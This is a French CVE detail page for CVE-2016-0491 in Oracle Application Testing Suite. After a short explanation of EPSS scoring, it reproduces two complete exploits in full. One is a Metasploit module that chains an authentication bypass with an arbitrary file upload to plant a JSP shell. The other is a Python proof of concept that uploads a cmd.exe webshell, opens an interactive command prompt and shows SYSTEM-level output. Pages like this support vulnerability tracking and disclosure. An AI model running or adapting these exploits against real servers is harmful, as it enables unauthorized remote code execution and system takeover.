CVE-2016-0491 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle ATS Arbitrary File Upload', 'Description' => %q{ This module exploits an authentication bypass and arbitrary file upload in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and unknown earlier versions, to upload and execute a JSP shell. }, 'Author' => [ 'Zhou Yu', # Proof of concept 'wvu' # Metasploit module ], 'References' => [ %w{CVE 2016-0492}, # Auth bypass %w{CVE 2016-0491}, # File upload %w{EDB 39691} # PoC ], 'DisclosureDate' => 'Jan 20 2016', 'License' => MSF_LICENSE, 'Platform' => %w{win linux}, 'Arch' => ARCH_JAVA, 'Privileged' => true, 'Targets' => [ ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'], ['OATS <= 12.4.0.2.0 (Linux)', 'Platform' => 'linux'] ], 'DefaultTarget' => 0 )) register_options([ Opt::RPORT(8088) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/admin/Login.do' ) if res && res.body.include?('12.4.0.2.0') CheckCode::Appears else CheckCode::Safe end end def exploit print_status("Uploading JSP shell to #{jsp_path}") upload_jsp_shell print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}") exec_jsp_shell end def upload_jsp_shell mime = Rex::MIME::Message.new mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"') mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"') mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed mime.add_part('*', nil, nil, 'form-data; name="fileType"') mime.add_part(payload.encoded, 'text/plain', nil, %Q{form-data; name="file1"; filename="#{jsp_filename}"}) mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"') mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"') mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"') register_files_for_cleanup(jsp_path) send_request_cgi( 'method' => 'POST', 'uri' => '/olt/Login.do/../../olt/UploadFileUpload.do', 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'data' => mime.to_s ) end def exec_jsp_shell send_request_cgi( 'method' => 'GET', 'uri' => "/olt/pages/#{jsp_filename}" ) end def jsp_directory case target['Platform'] when 'win' '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages' when 'linux' '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages' end end def jsp_filename @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' end def jsp_path jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename end end

# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit # Exploit Author: Zhou Yu <504137480@qq.com > # Vendor Homepage: http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn # Version: 12.4.0.2.0 # Tested on: Win7 SP1 32-bit # CVE : CVE-2016-0492 and CVE-2016-0491 import urllib2 import urllib ip = '192.168.150.239' port = 8088 url = "http://" + ip + ":" + str(port) #bypass authentication url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" request = urllib2.Request(url) webshell_content=''' <%@ page import="java.util.*,java.io.*" %> <% if (request.getParameter("{cmd}") != null) {{ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) {{ out.println(disr); disr = dis.readLine(); }} }} %> ''' boundary = "---------------------------7e01e2240a1e" request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) post_data = "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" post_data = post_data + "\r\n.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" post_data = post_data + "\r\nwebshell.jsp\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" post_data = post_data + "\r\n\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" post_data = post_data + "\r\n*\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" post_data = post_data + "Content-Type: text/plain\r\n" post_data = post_data + "\r\n" + webshell_content +"\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" post_data = post_data + "\r\nDefault\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" post_data = post_data + "\r\n.\r\n" post_data = post_data + "--" + boundary + "\r\n" post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : print "[+]upload done!" webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : print "[+]upload webshell successfully!" print "[+]return a cmd shell" while True: cmd = raw_input(">>: ") if cmd == "exit" : break print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: print "[-]attack fail!" else: print "[-]attack fail!" except Exception as e: print "[-]attack fail!" ''' #run the exploit and get a cmd shell root@kali:~/Desktop# python exploit.py [+]upload done! [+]wait a moment,detecting whether the webshell exists... [+]upload webshell successfully! [+]return a cmd shell >>: whoami nt authority\system >>: exit '''